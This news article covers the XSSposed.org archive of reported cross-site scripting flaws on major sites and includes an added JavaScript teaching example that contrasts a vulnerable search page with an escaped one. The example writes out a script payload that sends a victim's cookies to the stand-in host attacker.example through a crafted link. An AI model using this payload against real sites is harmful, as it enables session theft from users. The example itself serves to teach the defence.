A new online archive is gaining popularity among security researchers as a go-to source to anonymously submit cross-site
scripting vulnerabilities uncovered from across the Web. In less than two weeks, the site has amassed enough reported vulnerabilities to cast doubt on the security of dozens of high-profile companies' websites.
Having only received its first confirmed submission on June 18, XSSposed.org has tallied more than 300 confirmed cross-site scripting (XSS) vulnerabilities across hundreds of sites since its inception.
A typical submission provides the vulnerable URL, information on when the vulnerability was verified by the site's as-yet-unnamed administrators, whether the flaw has been fixed since it was first disclosed and the Google and Alexa rankings of the vulnerable domain.
Those rankings are used to sort submissions by the popularity of the Web domains. Familiar Web properties like Forbes.com, WashingtonPost.com and Bloomberg.com show up near the top of the list of heavily trafficked sites found to be susceptible to XSS attacks. Domains owned by companies like Toyota and Corsair, as well as prominent higher education institutions like the University of Cambridge and Harvard University, are also purportedly exposed.
XSSposed.org takes much of its impetus from the now-defunct XSSed.org -- an online archive that until recently had collected XSS vulnerabilities -- though the new site promises researchers complete anonymity if they desire, in the hopes that it will facilitate full disclosure.
"Submissions can be done anonymously -- all our logs are regularly deleted -- or under a security researcher's nickname or even real name," said the XSSposed.org website. "For security researchers, XSSposed is a safe place to report an XSS vulnerability and gain public recognition/credit, while for website owners and administrators, it's an up-to-date source of information to keep their websites safer."
Ilia Kolochenko, CEO of Swiss penetration testing and forensics firm High-Tech Bridge SA, said that he fully supported the site's mission to publicly expose XSS vulnerabilities.
Kolochenko said that he has disclosed security bugs to large organizations that tout their information security programs, but often either received no response at all, or a response that suggested fixing security vulnerabilities wasn't a priority for the organization. Those responses, he noted, tended to change dramatically once a media organization publicized the vulnerabilities.
"Usually, you notify a company and two weeks after, they ignored it and didn't reply," said Kolochenko. "As soon as the information appears somewhere online, 24 hours after, the vulnerability has typically been patched."
As for whether the cross-site scripting flaws listed on the site pose an immediate threat, Kolochenko said that his company tends to rate XSS -- a long-time staple of the OWASP top 10 Web application vulnerability list -- as a "medium-risk" vulnerability. As opposed to SQL injection vulnerabilities that can be used to compromise a site remotely, he added, such attacks rely on manipulating a user into clicking a maliciously crafted link.
The rewards of exploiting an XSS vulnerability also vary for attackers, Kolochenko said -- so patrons of an online store may have their accounts exposed via a cross-site scripting attack if they click on a malicious URL, but similar vulnerabilities on other sites may not be nearly as fruitful.
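The attack Kolochenko describes is reflected XSS: the server echoes part of the request URL into the page, so an attacker only needs a victim to open a crafted link. The following is an added example, not code from XSSposed.org or from any site listed there; the hypothetical search page, the `q` parameter, the `shop.example` and `attacker.example` hosts and the cookie names are all constructed for illustration. It shows the vulnerable renderer beside its output-escaped form, the link an attacker would send, and the HttpOnly cookie flag that limits the account-theft scenario described above even when an injection succeeds.

```javascript
// Reflected XSS on a hypothetical search page, with the fix beside it.
// Hosts, parameter names and cookie names here are constructed for this
// example; nothing is taken from the sites listed on XSSposed.org.

// Escape the five characters that let user input break out of an HTML
// text or quoted-attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the query string is interpolated straight into the markup.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: identical page, but the query is escaped at output time.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Stand-in for the server: read ?q= from the request URL and render.
// URL is a global in Node.js and browsers; searchParams decodes the value.
function handleRequest(requestUrl, render) {
  const query = new URL(requestUrl).searchParams.get('q') || '';
  return render(query);
}

// Constructed attacker payload: ship the victim's cookies to attacker.example.
const payload =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// The link the attacker would send to a victim (mail, forum post, ad, ...).
// The payload is URL-encoded so it survives the trip through the address bar.
function craftedLink(origin) {
  return origin + '/search?q=' + encodeURIComponent(payload);
}

// Crude check used below: did a raw <script tag reach the response?
// Real verification is done in a browser; this regex is only for the demo.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth: an HttpOnly cookie is not exposed through document.cookie,
// so a successful injection cannot read the session token with this payload.
function sessionCookieHeader(token, httpOnly) {
  return `session=${token}; Secure; SameSite=Lax` + (httpOnly ? '; HttpOnly' : '');
}

// Demo run against the constructed link.
const demoLink = craftedLink('https://shop.example');
console.log(demoLink);
console.log('vulnerable page carries script:',
  containsInjectedScript(handleRequest(demoLink, renderSearchVulnerable)));
console.log('hardened page carries script:',
  containsInjectedScript(handleRequest(demoLink, renderSearchSafe)));
console.log(handleRequest(demoLink, renderSearchSafe));
console.log(sessionCookieHeader('abc123', true));
```

Escaping on output is the fix for the echo itself; the HttpOnly flag is a separate control that blunts cookie theft but does nothing against a payload that acts on the victim's behalf from inside the page, which is why the escaping is not optional.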
Still, Kolochenko said that the companies with unaddressed vulnerabilities on the site should focus on fixing the problems in a timely fashion -- particularly the infosec-oriented organizations. He noted that two of the domains with the most vulnerabilities listed belong to Kaspersky, the Russia-based antimalware giant, and InfoSec Institute, an organization that provides training on a variety of security areas and certifications.
Update: A Kaspersky spokesperson said after publication that the XSS vulnerabilities on the website have now been addressed, and that has been confirmed on XSSposed.org.
While those organizations may not be focused specifically on Web security, and similar problems likely exist at many other security organizations, Kolochenko said that such companies ignoring long-known issues on their sites sends the wrong message.
"They are an important part of the information security industry and they should care about every aspect of information security, including their own Web sites and applications," said Kolochenko, "because if even they show they don't really care about the security of their sites, some organizations can say 'Even these big companies in information security have XSS vulnerabilities. Why should we care?' It gives the wrong impression that some parts of information security can be ignored or underestimated."
Kolochenko added, "This site might finally make people think about information security that up until today I would say many big companies almost ignored."